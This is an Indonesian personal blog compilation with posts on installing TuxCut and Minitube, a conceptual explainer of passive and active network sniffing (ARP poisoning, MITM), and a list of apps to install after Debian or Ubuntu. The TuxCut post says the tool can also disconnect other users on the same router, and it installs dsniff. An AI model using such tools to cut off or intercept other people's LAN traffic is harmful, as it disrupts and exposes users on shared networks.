                sumber : facebook cane giandro jojo

                Selasa, Mei 24

                tuxcut

                wahh lagi sharing sharing tentang anti netcut niii . mungkin kalo di windows banyak orang bilang netcut . namu jikalau di linux itu biasanya dikatakan tuxcut . tuxcut ini sama saja berjalan denagn net cut . namun tuxcut ini lebihnya untuk mescan host itu make nmap . 
                berikut ini cara install tuxcut 

                buka terminal aplication > accessories > terminal  ..... kemudian ketik 

                  sudo apt-get install arp-scan ( enter)
                  sudo apt-get install dsniff      (enter)
                  sudo apt-get install arptables (enter)

                sesudah itu tutup terminal . dan sekarang kita harus mendownload tuxcut nya . 

                ingat paket nya harus .deb untuk debian dan turunan nyaa . . 
                setelah di download klik 2 kali . dan klik install . sesudah di install 
                lihat aplikasi nya di aplication > accessories  > tuxcut 

                aplikasi tuxcut ini berguna untuk menghindari pemutusan jaringan dari orang yang iseng2 . 
                dan selain itu bisa juga untuk mutusin jaringan orang dalam router yang sama . . . 


                Senin, Mei 23

                minitube

                kaliiiii ini saya akan membahas minitube
                minitube itu adalah aplikasi yang nonton youtube tanpa buffering . adaaa sih buffering tapi hanya sebentar . dan aplikasi ini di dukung dengan download nya lagi . so kita bisa dowload vidio youtube dengan aolikasi minitube

                berikut ini cara nya
                • sudo add-apt-repository ppa:nilarimogard/webupd8
                • sudo apt-get update
                • sudo apt-get install phonon-backend-gstreamer gstreamer0.10-ffmpeg gstreamer0.10-plugins-bad
                • sudo apt-get install minitube
                • sudo apt-get remove phonon-backend-xine
                anda bisa membuka minitube di Applications > Sound & Video > Minitube





                network sniffing

                Network Sniffing adalah suatu aktifitas menyadap yang di lakukan dalam jaringan yang sangat sulit untuk di cegah, walaupun kita telah menginstall berbagai macam software untuk mencegah serangan dalam jaringan. ini adalah permasalahan dari komunikasi atau protokol jaringan dan tidak ada hubungannya dengan sistem operasi”.

                Aktifitas menyadap atau sniffing ini terbagi 2 jenis yaitu :
                1.Passive Sniffing adalah suatu kegiatan penyadapan tanpa merubah data atau paket apapun di jaringan. Passive sniffing yang umum di lakukan yaitu pada Hub, hal ini di sebabkan karena prinsip kerja hub yang hanya bertugas meneruskan signal ke semua komputer (broadcast), berbeda dengan switch yang mempunyai cara untuk menghindari collision atau bentrokan yang terjadi pada hub dengan membaca MAC address komputer. Beberapa program yang umumnya di gunakan untuk melakukan aktifitas ini yaitu wireshark, cain-abel, dsb.
                2. Active sniffing adalah kegiatan sniffing yang dapat melakukan perubahan paket data dalam jaringan agar bisa melakukan sniffing, active sniffing dengan kata lain merupakan kebalikan dari passive sniffing. Active sniffing umumnya di lakukan pada Switch, hal ini di dasar karena perbedaan prinsip kerja antara Hub dan Switch, seperti yang di jelaskan di atas. Active sniffing yang paling umum di lakukan adalah ARP Poisoning, Man in the middle attack(MITM).
                Dua jenis sniffing ini sangat merugikan jika terjadi di dalam jaringan karena bisa saja data-data pribadi kita atau account-account pribadi kita semacam e-mail yang bersifat sensitif dapat tercuri.
                Sniffing sendiri merupakan suatu tindakan yang sangat sulit untuk di cegah. Tidak ada solusi yang mudah, cepat, dan aman, yang bisa kita lakukan untuk mencecegah serangan semacam ini. Namun tentunya, kita bisa meminimalisir kerugian yang mungkin terjadi di kemudian hari. Hal yang paling cepat di gunakan dan tidak memakan biaya besar adalah penggunaan enkripsi sehingga data-data yang lalu lalang di dalam jaringan kita sangat sulit untuk di baca.







                sumber :http://putri-nirmala.blogspot.com/search?updated-min=2011-01-01T00%3A00%3A00-08%3A00&updated-max=2012-01-01T00%3A00%3A00-08%3A00&max-results=7

                hal hal yang dilakukan setelah install debian

                yang pertama kita harus menentukan repository untuk lokal . karena sewaktu kita install debian repository (alamat) belom di tentukan local nya . jadi ini ada cara ganti repository untuk local ( indonesia )
                Buka update Manager di Menu System > Administration > Update Manager. Kemudian pilih Settings > pada bar Tab Ubuntu Sofware Ganti servernya menjadi > http://kambing.ui.ac.id/ubuntu.
                dan setelah kita mengatur nya  kita harus menginstall aplicasi yang penting .....


                avant Window Navigator, Menampilkan daftar aplikasi seperti Rocket Dock di Windows
                sudo apt-get install avant-window-navigator
                Compiz – Visual Efek
                sudo apt-get install compizconfig-settings-manager
                sudo apt-get install compiz-fusion-plugins-extra
                Conky – System Monitor
                sudo apt-get install conky
                Java – Bahasa Pemrograman
                sudo apt-get install openjdk-6-jdk
                Netbeans – Editor Gui yang sering digunakan dalam java
                sudo apt-get install netbeans
                Geany – Editor teks yang mendukung banyak tipe file
                sudo apt-get install geany
                Flash player – Pengaya untuk Browser
                apt-get install flashplugin-installer
                Zip – Compresi Data
                apt-get install p7zip-full
                Record My Desktop – Desktop Recorder
                sudo apt-get install gtk-recordmydesktop
                Cheese – Webcam
                sudo apt-get install cheese
                Clipgrab – Youtube Dowloader
                sudo add-apt-repository ppa:clipgrab-team/ppa && apt-get update
                sudo apt-get install clipgrab
                Thunderbird – Email Clien, Under Windows nya Microsoft Outlook
                sudo apt-get install thunderbird
                Pidgin – Instan Messaging
                sudo apt-get install pidgin
                Skype – Komunikasi peer to peer
                sudo apt-get install skype
                Gimp – Graphic editor
                sudo add-apt-repository ppa:matthaeus123/mrw-gimp-svn && sudo apt-get update
                apt-get install gimp
                Inkscape – Vektor Graphic Editor
                sudo apt-get install inkscape
                Blender – 3D Graphics Design
                sudo apt-get install blender
                Banshe – Music Player
                sudo apt-get install banshee
                Audacity – Audio Editor
                sudo apt-get install audacity
                SMPlayer – Video player
                sudo apt-get install smplayer
                Kino – Video Editor
                sudo apt-get install kino
                Libre Office – Office
                sudo add-apt-repository ppa:libreoffice/ppa && sudo apt-get update
                apt-get install libreoffice
                Ubuntu Tweak –  Configurasi desktop dan aplikasi
                sudo add-apt-repository ppa:ubuntu-tweak-testing/ppa && sudo apt-get update
                sudo apt-get install ubuntu-tweak
                di atas hanya sebagian aplikaasi di linux masih beribu2 lagi aplikasi nya . jadi install nya sesuai kebutuhan ok ok ok